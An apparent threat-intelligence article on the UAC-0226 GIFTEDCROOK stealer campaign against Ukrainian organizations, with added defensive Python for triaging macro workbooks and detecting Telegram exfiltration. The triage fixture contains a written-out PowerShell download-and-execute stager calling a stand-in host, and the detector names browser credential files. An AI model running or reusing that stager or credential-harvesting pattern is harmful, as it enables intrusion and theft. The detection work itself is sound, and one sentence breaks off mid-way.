In recent months, Ukraine has become a central focus of cyber-espionage campaigns, with government and military organizations bearing the brunt of increasingly targeted attacks. The UAC-0226 hacking group is running an ongoing campaign that delivers a new malware strain called GIFTEDCROOK. The activity, described by CERT-UA in an alert published on April 6, 2025, represents a growing threat to the country's national security. Ukrainian organizations, particularly in the military and law enforcement sectors, are at significant risk: the group gets in through phishing and macro-enabled documents rather than software exploits, then deploys malware built to harvest browser data and credentials and exfiltrate them to an external platform.
Key Points
The UAC-0226 group has been targeting Ukrainian organizations since February 2025, focusing on military innovation centers, armed forces units, law enforcement, and local governments, especially in areas near the eastern border with the conflict zone. The primary aim is to steal sensitive data, including personal and institutional information, using purpose-built malware delivered by phishing.
The main intrusion vector is spear-phishing with malicious macro-enabled Excel workbooks (.xlsm) attached. The lures are dressed up as routine topics such as landmine clearance, drone production, and administrative fines. Each workbook carries a base64-encoded payload; nothing runs until the victim clicks through the macro warning, at which point the VBA code decodes the payload and launches the next stage. No software vulnerability is involved, which is why macro policy (blocking macros in files that arrived from the internet) and user awareness remain effective controls against this carrier.
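As an added example (the editor's code, not CERT-UA's tooling or anything from the original article), the following Python script performs static triage of a suspect .xlsm carrier of the kind described above. It confirms that the workbook contains a VBA project and scans the XML parts of the package for long base64 runs, decoding each one and checking for PowerShell stager or PE markers. The fixture workbook, the stager string, the example.invalid URL, and the marker list are all constructed for this example. Note that the VBA module source inside vbaProject.bin is stored MS-OVBA compressed, so this script only flags its presence; decompressing and reading the macro is left to a dedicated tool such as olevba.

```python
import base64
import binascii
import io
import re
import zipfile
from typing import Optional

# Every macro-enabled Office Open XML workbook stores its VBA project in this zip member.
VBA_PART = "xl/vbaProject.bin"
# A base64 run this long inside a cell, shared string or custom XML part is far more
# likely to be a staged script or binary than ordinary workbook content.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")
# Substrings that mark a decoded blob as a PowerShell stager. These are the editor's
# assumed indicators for the example, not indicators taken from the CERT-UA report.
PAYLOAD_MARKERS = ("powershell", "invoke-expression", "iex", "webclient",
                   "downloadfile", "downloadstring", "frombase64string",
                   "-encodedcommand")


def classify_blob(blob: bytes) -> Optional[str]:
    """Decode one base64 run and name the payload markers it contains, or None."""
    try:
        raw = base64.b64decode(blob + b"=" * (-len(blob) % 4))
    except binascii.Error:
        return None
    if raw.startswith(b"MZ"):
        return "pe-image"
    # -EncodedCommand payloads are UTF-16LE: every second byte of ASCII text is NUL.
    if len(raw) >= 4 and raw[1::2].count(0) > len(raw) // 4:
        text = raw.decode("utf-16-le", errors="ignore")
    else:
        text = raw.decode("latin-1")
    lowered = text.lower()
    hits = [marker for marker in PAYLOAD_MARKERS if marker in lowered]
    return ",".join(hits) if hits else None


def triage_xlsm(data: bytes) -> dict:
    """Static triage of an .xlsm given as bytes: macro presence and staged payloads."""
    result = {"has_vba_project": False, "base64_blobs": [], "payload_hits": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        result["has_vba_project"] = VBA_PART in names
        for name in names:
            # The VBA source in vbaProject.bin is MS-OVBA compressed, so a raw scan of it
            # is only a weak signal; use olevba for a definitive look at the macro.
            if not name.endswith((".xml", ".rels", ".bin")):
                continue
            for match in B64_RUN.finditer(zf.read(name)):
                blob = match.group(0)
                result["base64_blobs"].append((name, len(blob)))
                verdict = classify_blob(blob)
                if verdict:
                    result["payload_hits"].append((name, verdict))
    return result


# Constructed fixture: a stager one-liner of the sort a macro would decode and run.
# The URL is a reserved example domain; nothing here is real attacker infrastructure.
STAGER = (b"$u='http://example.invalid/stage2';$p=\"$env:TEMP\\svc.ps1\";"
          b"(New-Object Net.WebClient).DownloadFile($u,$p);"
          b"powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File $p")


def build_sample_xlsm(with_payload: bool = True) -> bytes:
    """Build a minimal in-memory .xlsm; with_payload puts the base64 stager in cell A1."""
    cell = base64.b64encode(STAGER).decode() if with_payload else "quarterly totals"
    sheet = ('<?xml version="1.0" encoding="UTF-8"?>'
             '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
             f'<sheetData><row r="1"><c r="A1" t="str"><v>{cell}</v></c></row></sheetData>'
             '</worksheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        zf.writestr("xl/workbook.xml", '<?xml version="1.0"?><workbook/>')
        zf.writestr("xl/worksheets/sheet1.xml", sheet)
        if with_payload:
            # Placeholder bytes (an OLE header plus padding) standing in for a real VBA project.
            zf.writestr(VBA_PART, b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_xlsm(build_sample_xlsm()))
```

Run it against a real attachment with `triage_xlsm(open(path, "rb").read())`. A `has_vba_project` of True on a document that has no business carrying macros is already a reason to quarantine; a decoded blob with stager markers is a reason to pull the macro with olevba and hunt for the dropped second stage on any host that opened the file.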
Two distinct malware strains have been identified in the campaign. The first is a .NET-based tool that embeds a PowerShell reverse shell script. The second, more capable strain is GIFTEDCROOK, a stealer written in C/C++. GIFTEDCROOK targets Chrome, Edge, and Firefox, extracting cookies, saved passwords, and browsing history. The collected files are packed into an archive with PowerShell's Compress-Archive cmdlet and exfiltrated through Telegram.
The campaign is particularly insidious because the phishing emails are sent from previously compromised accounts, which lends them credibility and increases the likelihood of infection. CERT-UA has issued guidance recommending that Ukrainian organizations step up monitoring of email and web server logs to detect related activity. Security teams are urged to deploy proactive detections and make use of threat intelligence to blunt the campaign.
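The behaviors described in the two paragraphs above (browser data packed with Compress-Archive, then pushed to Telegram) and CERT-UA's advice to watch logs for them translate into a simple correlated detection. The Python below is an added example written for this page, not CERT-UA's or SOC Prime's detection logic: it runs two rules over constructed, already-normalized telemetry (PowerShell script-block text and per-process network connections) and raises the severity when browser-artifact archiving and a PowerShell connection to Telegram's API host occur on the same host within fifteen minutes. The ATT&CK technique tags are this editor's mapping of the article's description, not CERT-UA's published mapping; the event schema, hostnames, paths, the api.telegram.org destination, and the correlation window are all assumptions.

```python
import re
from datetime import datetime, timedelta

# Files a stealer needs for cookies, saved logins and history in Chrome, Edge (Chromium)
# and Firefox. "History" and "Cookies" are loose on purpose; in production anchor them to
# the browser profile directory to cut false positives.
BROWSER_ARTIFACTS = re.compile(
    r"Login Data|Cookies|Web Data|History|places\.sqlite|cookies\.sqlite|logins\.json|key4\.db",
    re.IGNORECASE)
ARCHIVE_CMDLET = re.compile(r"\bCompress-Archive\b", re.IGNORECASE)
# Assumed exfiltration destination for the example: Telegram's API host.
TELEGRAM_API = re.compile(r"(^|\.)api\.telegram\.org$", re.IGNORECASE)
# How long after browser data is archived a Telegram connection still counts as related.
CORRELATION_WINDOW = timedelta(minutes=15)

# Constructed sample telemetry in a simplified, already-normalized schema
# (script-block logs and process network connections). Hosts, users and paths are made up.
SAMPLE_EVENTS = [
    {"ts": "2025-04-06T09:12:03", "host": "WS-017", "kind": "ps_scriptblock", "image": "powershell.exe",
     "text": 'Compress-Archive -Path "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data",'
             '"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*\\cookies.sqlite" -DestinationPath "$env:TEMP\\u.zip"'},
    {"ts": "2025-04-06T09:12:41", "host": "WS-017", "kind": "net_conn", "image": "powershell.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    # Benign: an admin backing up a documents folder with the same cmdlet.
    {"ts": "2025-04-06T10:02:15", "host": "WS-042", "kind": "ps_scriptblock", "image": "powershell.exe",
     "text": "Compress-Archive -Path C:\\Users\\j.doe\\Documents\\reports -DestinationPath D:\\backup\\reports.zip"},
    # Benign: a browser visiting Telegram's web client.
    {"ts": "2025-04-06T10:05:00", "host": "WS-042", "kind": "net_conn", "image": "chrome.exe",
     "dest_host": "web.telegram.org", "dest_port": 443},
    # Suspicious on its own: PowerShell talking to the API host with no staging seen first.
    {"ts": "2025-04-06T11:30:00", "host": "WS-099", "kind": "net_conn", "image": "powershell.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
]


def detect(events):
    """Apply both rules in time order and correlate them per host. Returns alert dicts."""
    staged = {}   # host -> timestamps at which browser artifacts were archived
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        if (ev["kind"] == "ps_scriptblock" and ARCHIVE_CMDLET.search(ev["text"])
                and BROWSER_ARTIFACTS.search(ev["text"])):
            staged.setdefault(ev["host"], []).append(ts)
            alerts.append({"ts": ev["ts"], "host": ev["host"], "severity": "medium",
                           "rule": "browser_data_archived_with_powershell",
                           "attack": ["T1059.001", "T1560.001", "T1555.003", "T1539"]})
        elif (ev["kind"] == "net_conn" and ev["image"].lower() == "powershell.exe"
                and TELEGRAM_API.search(ev["dest_host"])):
            related = [t for t in staged.get(ev["host"], []) if ts - t <= CORRELATION_WINDOW]
            if related:
                alerts.append({"ts": ev["ts"], "host": ev["host"], "severity": "high",
                               "rule": "browser_data_staged_then_telegram_exfil",
                               "attack": ["T1059.001", "T1560.001", "T1567"]})
            else:
                alerts.append({"ts": ev["ts"], "host": ev["host"], "severity": "medium",
                               "rule": "powershell_to_telegram_api",
                               "attack": ["T1059.001", "T1567"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

On the sample, WS-017 produces a medium alert for the staging and a high alert for the follow-on Telegram connection, WS-099 produces a medium alert for an unexplained PowerShell connection, and the admin backup on WS-042 produces nothing. Script-block logging (Event ID 4104) has to be enabled for the first rule to see the cmdlet arguments at all, and the network rule needs a source that ties connections to the originating process, such as Sysmon Event ID 3 or an EDR network event; a plain proxy log without process attribution will only support the lower-severity version.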
What Undercode Says:
The rise of GIFTEDCROOK under the UAC-0226 group's campaign is a stark reminder of the evolving nature of cyber-espionage and its growing sophistication. Phishing remains the dominant initial-access tactic, but pairing it with a purpose-built stealer like GIFTEDCROOK shows a new level of precision and targeting. By abusing everyday tools that organizations rely on, such as Excel macros and PowerShell, the attackers need no exploit, and their activity blends into routine administrative work, which makes it harder to detect.
What sets GIFTEDCROOK apart is its focus on the sensitive data stored in web browsers: cookies, saved credentials, and history. That focus signals an intent to reuse stolen credentials and sessions in follow-on operations against the same targets. Exfiltrating over Telegram is an example of attackers routing data through a legitimate, widely used service so that the traffic blends with normal activity and is rarely blocked by default.
The MITRE ATT&CK® framework plays a crucial role in understanding the tactics and techniques employed in these attacks. By mapping the UAC-0226 group's behaviors to the framework, CERT-UA has provided insights that help organizations prepare and respond. The techniques involved, such as spear-phishing attachments and PowerShell execution, underscore the importance of robust email filtering and endpoint protection.
The involvement of state-sponsored groups in cyber-espionage campaigns targeting critical sectors like defense and government highlights the high stakes of these attacks. The ability to quickly detect and respond to such sophisticated threats is essential for minimizing the impact on national security.
As cyber-espionage continues to rise globally, especially targeting countries in conflict zones, organizations must remain vigilant and adopt advanced defensive measures. The integration of threat intelligence platforms like the SOC Prime Platform, which offers Sigma rules and AI-based tools, will be essential in the ongoing battle against state-sponsored cyber threats.
Given the strategic importance of the Ukrainian targets,
Fact Checker Results:
- The identification of UAC-0226 and their use of GIFTEDCROOK malware is consistent with ongoing trends in state-sponsored cyber-attacks, particularly targeting military and government organizations.
- The use of Telegram for data exfiltration is a known tactic among cybercriminal groups, reflecting an increasing reliance on encrypted communication tools for stealthy operations.
References:
Reported By: cyberpress.org